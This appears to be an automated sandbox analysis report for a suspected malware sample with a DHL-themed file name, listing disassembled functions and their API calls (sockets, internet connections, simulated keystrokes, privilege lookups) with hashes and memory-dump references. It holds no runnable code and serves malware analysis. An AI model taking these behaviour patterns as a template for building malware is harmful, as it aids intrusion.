                                                                                        • Opcode Fuzzy Hash: 5d4cf670135fc5060c40eb1380a60d0780cadf931620a52e9d3d6c7f2bcc3e26
                                                                                        • Instruction Fuzzy Hash: EF51C4787003019ADF24AF65D891B2EB3E5EF45311F60C81FE996DB292DB30D8C8A708
                                                                                        Function 00C769AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 00C769D1
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00C769E1
                                                                                          • Part of subcall function 00C09837: __itow.LIBCMT ref: 00C09862
                                                                                          • Part of subcall function 00C09837: __swprintf.LIBCMT ref: 00C098AC
                                                                                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00C76A45
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00C76A51
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$__itow__swprintfsocket
                                                                                        • String ID:
                                                                                        • API String ID: 2214342067-0
                                                                                        • Opcode ID: 01da65fa9453cad06f4795e2b82b9b1c64fc0a714d7aa0670c29b4a92d6f62c3
                                                                                        • Instruction ID: 69a995bbdee01c1327e58ff54391a8f1297cb109d900e77f498e9cce91b1dc8c
                                                                                        • Opcode Fuzzy Hash: 01da65fa9453cad06f4795e2b82b9b1c64fc0a714d7aa0670c29b4a92d6f62c3
                                                                                        • Instruction Fuzzy Hash: 8D418D75740600AFEB60AF24CC86F6A77A4DB04B14F44C558FA59AB3D3DB709D01EB91
                                                                                        Function 00C7641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00C8F910), ref: 00C764A7
                                                                                        • _strlen.LIBCMT ref: 00C764D9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _strlen
                                                                                        • String ID:
                                                                                        • API String ID: 4218353326-0
                                                                                        • Opcode ID: c181d57e0883e1da3befa6bb62535fdc9bc1a007083fbd7cedb55415539d0c02
                                                                                        • Instruction ID: 744ae2a0f833b78e3ada17d0dc7d8a7edef7b5812be825095058453b4bc5eee1
                                                                                        • Opcode Fuzzy Hash: c181d57e0883e1da3befa6bb62535fdc9bc1a007083fbd7cedb55415539d0c02
                                                                                        • Instruction Fuzzy Hash: 8741A235600504AFCB14EBA8EC85FAEB7A9EF44310F14C159F919972D3EB30AE45EB50
                                                                                        Function 00C6B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00C6B89E
                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 00C6B8C4
                                                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00C6B8E9
                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00C6B915
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                        • String ID:
                                                                                        • API String ID: 3321077145-0
                                                                                        • Opcode ID: da84544aa89f9f2de435ab38bff04c3c676f00d40729e2702c3998db2106a64a
                                                                                        • Instruction ID: f7aaf94ed63b5f487f2ca6a66e50dc00c16783805972ae88253e5d630256f636
                                                                                        • Opcode Fuzzy Hash: da84544aa89f9f2de435ab38bff04c3c676f00d40729e2702c3998db2106a64a
                                                                                        • Instruction Fuzzy Hash: 7F41E579600611DFCB21EF15C485A59BBA1EF4A310F19C098ED5AAB3A2CB30ED42DB91
                                                                                        Function 00C8AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ClientToScreen.USER32(?,?), ref: 00C8AB60
                                                                                        • GetWindowRect.USER32(?,?), ref: 00C8ABD6
                                                                                        • PtInRect.USER32(?,?,00C8C014), ref: 00C8ABE6
                                                                                        • MessageBeep.USER32(00000000), ref: 00C8AC57
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1352109105-0
                                                                                        • Opcode ID: 923aafdaa92ef37376892e9ea85bd29f373c3208d342d74b79ad88ab7fc85f67
                                                                                        • Instruction ID: 7ec625c69f2a673bb937f938a8b2a64a0f5bcfe56edf1ce99814379d8229cbb1
                                                                                        • Opcode Fuzzy Hash: 923aafdaa92ef37376892e9ea85bd29f373c3208d342d74b79ad88ab7fc85f67
                                                                                        • Instruction Fuzzy Hash: 2F418D30600119DFEB11EF58C884B6D7BF5FF49314F1881AAE825DB261D732E981DB9A
                                                                                        Function 00C60AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00C60B27
                                                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 00C60B43
                                                                                        • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00C60BA9
                                                                                        • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00C60BFB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                        • String ID:
                                                                                        • API String ID: 432972143-0
                                                                                        • Opcode ID: f70bac1dbfd0a12894cdc0cb3249519dec692ba120a5924e63c5b0a81ad64faf
                                                                                        • Instruction ID: fc22c69a4f10509eeafb2a28f621cf5d39e62a599f4400ef594cfa970967981d
                                                                                        • Opcode Fuzzy Hash: f70bac1dbfd0a12894cdc0cb3249519dec692ba120a5924e63c5b0a81ad64faf
                                                                                        • Instruction Fuzzy Hash: 35314830940608AFFB348B29CC85FFFBBA5EB85319F28835AE4A1721D1C3758E859755
                                                                                        Function 00C60C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?,753DC0D0,?,00008000), ref: 00C60C66
                                                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00C60C82
                                                                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 00C60CE1
                                                                                        • SendInput.USER32(00000001,?,0000001C,753DC0D0,?,00008000), ref: 00C60D33
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                        • String ID:
                                                                                        • API String ID: 432972143-0
                                                                                        • Opcode ID: 633d0103afa9ca1f5659bab3cc18c872a8d759c57e3a7594546103cbc430a784
                                                                                        • Instruction ID: 7718eac54c0d186d046f77472982f15f8451f5a05a13d0baac6b05b212c0592c
                                                                                        • Opcode Fuzzy Hash: 633d0103afa9ca1f5659bab3cc18c872a8d759c57e3a7594546103cbc430a784
                                                                                        • Instruction Fuzzy Hash: 5B314630A402186EFF348B65C844BFFBBA6EB45310F28431EE4A1B21D1C3359A86D766
                                                                                        Function 00C361C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00C361FB
                                                                                        • __isleadbyte_l.LIBCMT ref: 00C36229
                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00C36257
                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00C3628D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                        • String ID:
                                                                                        • API String ID: 3058430110-0
                                                                                        • Opcode ID: 547c8c91ba25818d1321175f12b769a457b96868a7249aed7091fb8c330377ca
                                                                                        • Instruction ID: 0a8be7de29b5cfa5e18b3e6ad06508cd198b2f9061be0ac92170b5f018860b37
                                                                                        • Opcode Fuzzy Hash: 547c8c91ba25818d1321175f12b769a457b96868a7249aed7091fb8c330377ca
                                                                                        • Instruction Fuzzy Hash: 8C31D030614256BFDF218F65CC48BAF7BB9FF42310F168028E864871A1DB32DA50DB90
                                                                                        Function 00C84EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32 ref: 00C84F02
                                                                                          • Part of subcall function 00C63641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C6365B
                                                                                          • Part of subcall function 00C63641: GetCurrentThreadId.KERNEL32 ref: 00C63662
                                                                                          • Part of subcall function 00C63641: AttachThreadInput.USER32(00000000,?,00C65005), ref: 00C63669
                                                                                        • GetCaretPos.USER32(?), ref: 00C84F13
                                                                                        • ClientToScreen.USER32(00000000,?), ref: 00C84F4E
                                                                                        • GetForegroundWindow.USER32 ref: 00C84F54
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                        • String ID:
                                                                                        • API String ID: 2759813231-0
                                                                                        • Opcode ID: ec4da4fbab38511a88a59b3373ede76139abb98ba292bfcb0bb03c9c9951edec
                                                                                        • Instruction ID: cc84f01bbe9dd48b931ad0ec826e471725c12f540727e3d81c6a2a045c682268
                                                                                        • Opcode Fuzzy Hash: ec4da4fbab38511a88a59b3373ede76139abb98ba292bfcb0bb03c9c9951edec
                                                                                        • Instruction Fuzzy Hash: 7A313EB1D00108AFDB00EFB5C885AEFB7F9EF88304F10806AE415E7242DA719E45DBA4
                                                                                        Function 00C8C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C02612: GetWindowLongW.USER32(?,000000EB), ref: 00C02623
                                                                                        • GetCursorPos.USER32(?), ref: 00C8C4D2
                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00C3B9AB,?,?,?,?,?), ref: 00C8C4E7
                                                                                        • GetCursorPos.USER32(?), ref: 00C8C534
                                                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00C3B9AB,?,?,?), ref: 00C8C56E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2864067406-0
                                                                                        • Opcode ID: 7394daad72f36e2a0675abbea810aa18ba6e2d925528e234b9cd5d4b9063ad56
                                                                                        • Instruction ID: 38c61471cd7f28552cb81601b6776e7c5ebb5af7379920c6e46ed822084ca0e8
                                                                                        • Opcode Fuzzy Hash: 7394daad72f36e2a0675abbea810aa18ba6e2d925528e234b9cd5d4b9063ad56
                                                                                        • Instruction Fuzzy Hash: BA319335500018BFCF15DF98C898FAE7BB5EB49314F044069F9158B2A1C731AE51EBA8
                                                                                        Function 00C58656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C5810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C58121
                                                                                          • Part of subcall function 00C5810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C5812B
                                                                                          • Part of subcall function 00C5810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C5813A
                                                                                          • Part of subcall function 00C5810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C58141
                                                                                          • Part of subcall function 00C5810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C58157
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00C586A3
                                                                                        • _memcmp.LIBCMT ref: 00C586C6
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C586FC
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00C58703
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                        • String ID:
                                                                                        • API String ID: 1592001646-0
                                                                                        • Opcode ID: 0518d1bfaa8da54f68b3ed1307fcd448eb045eda2360368ea43f9c4c8b35fda6
                                                                                        • Instruction ID: ddf688bda5c977defdfd5f64e2cdee4c99ce4b3cea1e795e10238b26fce64bac
                                                                                        • Opcode Fuzzy Hash: 0518d1bfaa8da54f68b3ed1307fcd448eb045eda2360368ea43f9c4c8b35fda6
                                                                                        • Instruction Fuzzy Hash: 78217A71E01109EFDB10DFA4C989BEEB7B8EF45306F154059E854AB240DB30AE49DB98
                                                                                        Function 00C2098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __setmode.LIBCMT ref: 00C209AE
                                                                                          • Part of subcall function 00C05A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C67896,?,?,00000000), ref: 00C05A2C
                                                                                          • Part of subcall function 00C05A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C67896,?,?,00000000,?,?), ref: 00C05A50
                                                                                        • _fprintf.LIBCMT ref: 00C209E5
                                                                                        • OutputDebugStringW.KERNEL32(?), ref: 00C55DBB
                                                                                          • Part of subcall function 00C24AAA: _flsall.LIBCMT ref: 00C24AC3
                                                                                        • __setmode.LIBCMT ref: 00C20A1A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                        • String ID:
                                                                                        • API String ID: 521402451-0
                                                                                        • Opcode ID: 918d6f99872fe094ed89bf82a6ac85a3f82c2f91aaf67ad8b54a15da3651042c
                                                                                        • Instruction ID: ea5601a3584f44958d58e572b111e43c6f519e1610598a2fcf5855fce76fd5ad
                                                                                        • Opcode Fuzzy Hash: 918d6f99872fe094ed89bf82a6ac85a3f82c2f91aaf67ad8b54a15da3651042c
                                                                                        • Instruction Fuzzy Hash: 2B113A72A04214AFDB08B7B4BC47EBEB7A8DF41320F644116F105575C3EE305986B7A5
                                                                                        Function 00C71767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C717A3
                                                                                          • Part of subcall function 00C7182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C7184C
                                                                                          • Part of subcall function 00C7182D: InternetCloseHandle.WININET(00000000), ref: 00C718E9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$CloseConnectHandleOpen
                                                                                        • String ID:
                                                                                        • API String ID: 1463438336-0
                                                                                        • Opcode ID: 729a2fb555704b2ce433518a35187a7f125f06f4e1580aa9098c516f3774b4be
                                                                                        • Instruction ID: a1fdb6dd50468a2ba3005e0ffc21f7d044eefff41c272aca6f6b7c82e8793dc3
                                                                                        • Opcode Fuzzy Hash: 729a2fb555704b2ce433518a35187a7f125f06f4e1580aa9098c516f3774b4be
                                                                                        • Instruction Fuzzy Hash: 68210431200601BFEB128F64CC00FBABBADFF48710F18802EFD1996191D731D911A7A1
                                                                                        Function 00C63A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetFileAttributesW.KERNEL32(?,00C8FAC0), ref: 00C63A64
                                                                                        • GetLastError.KERNEL32 ref: 00C63A73
                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C63A82
                                                                                        • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00C8FAC0), ref: 00C63ADF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                        • String ID:
                                                                                        • API String ID: 2267087916-0
                                                                                        • Opcode ID: 340ea2847690c714e562a02451599bd4e6042c3acf9cbe3c28613ac3f93b7208
                                                                                        • Instruction ID: 265691b6ad6faa746bbb9be2ecd12125190daed30d1a841fc1d6a0d9ab3d42d2
                                                                                        • Opcode Fuzzy Hash: 340ea2847690c714e562a02451599bd4e6042c3acf9cbe3c28613ac3f93b7208
                                                                                        • Instruction Fuzzy Hash: 942194345082419FC710EF68C8C196BB7E4AE55364F144A2DF4A9C72E2D7319A46EB52
                                                                                        Function 00C350E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 00C35101
                                                                                          • Part of subcall function 00C2571C: __FF_MSGBANNER.LIBCMT ref: 00C25733
                                                                                          • Part of subcall function 00C2571C: __NMSG_WRITE.LIBCMT ref: 00C2573A
                                                                                          • Part of subcall function 00C2571C: RtlAllocateHeap.NTDLL(013A0000,00000000,00000001,00000000,?,?,?,00C20DD3,?), ref: 00C2575F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap_free
                                                                                        • String ID:
                                                                                        • API String ID: 614378929-0
                                                                                        • Opcode ID: c01e9455fa6f52207fd69fe45da505f0e0c2692e0246c4d8d065864d76756c1e
                                                                                        • Instruction ID: 4f24f173f76774d67784f71dcda98e01c79fe947781b7252aea89fec86a44592
